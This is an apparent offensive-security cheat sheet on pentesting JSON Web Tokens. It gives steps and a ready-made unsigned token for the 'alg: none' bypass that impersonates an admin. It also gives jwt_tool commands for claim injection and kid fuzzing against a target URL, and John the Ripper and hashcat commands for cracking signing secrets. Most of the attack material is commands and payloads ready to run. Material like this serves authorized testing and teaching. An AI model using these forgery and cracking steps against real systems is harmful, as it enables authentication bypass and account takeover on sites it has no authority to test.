Exploit Notes

JWT (Json Web Token) Pentesting

Last modified: 2023-03-20

Web

JWT is a proposed internet standard for creating data with optional signature and optional encryption whose payload holds JSON that asserts some number of claims.

Decode JWT

  • There are some online JWT decoder/encoder tools like JWT.io.
  • CyberChef can be used for JWT decode.

Manipulate JWT

If the website uses JWT and we can see the token, copy the JWT and paste it in jwt.io.

  1. Replace the “alg” value with “none” in header. (try the alg header variations such as “none”, “None”, “nOnE”, “NONE”.)
  2. Replace arbitrary values of the payload e.g. “username” with “admin”.
  3. Empty the signature field.

If the error “Invalid Signature” occured, we can manually create Base64 value for each section.
If you want to empty the signature field manually, you can delete the final section.
For example,

eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0=.eyJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNjc4NDYwNjM1fQ==.

Now copy the JWT.
Go to the website and replace the original JWT with the new one in HTTP header.


Automation

JWT Toolkit is a toolkit for testing, tweaking and cracking JWT.

Decode

python jwt_tool.py <Base64_Encoded_JWT>

Scan

# -t: Target URL
# -rc: Cookies
# -M pb: Playbook Scan Mode
# -cv: Canary Value
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -M pb -cv "not authorized"

Exploit

# -X i: Exploit (inject inline)
# -I -pc username -pv admin: Inject Claim ("username": admin)
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -X i -I -pc username -pv admin

Fuzz

# -I -hc kid -hv wordlist.txt: Inject Claim ("kid": FUZZ)
python jwt_tool.py -t https://vulnerable.com/admin -rc "jwt=<Base64_Encoded_JWT>;anothercookie=test" -I -hc kid -hv wordlist.txt

Manual Pentesting

# Tamper (Manual Exploit)
python jwt_tool.py <Base64_Encoded_JWT> -T

# Exploit (Automated Exploit)
# -X a: Exploit (alg: none)
python jwt_tool.py <Base64_Encoded_JWT> -X a

Crack JWT Secret

First of all, you need to put the JWT into the text file.

echo -n '<Base64_Encoded_JWT>' > jwt.txt

Then crack the hash using John the Ripper or Hashcat.

john --format=HMAC-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt jwt.txt

hashcat -a 0 -m 16500 jwt.txt passwords.txt
hashcat -a 0 -m 16500 jwt.txt passwords.txt -r rules/best64.rule
hashcat -a 3 -m 16500 jwt.txt '?u?l?l?l?l?l?l?l' -i --increment-min=6

If you found a secret, you can create a new JWT using the secret on tools like JWT.io.

Also we can use jwt-cracker.

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.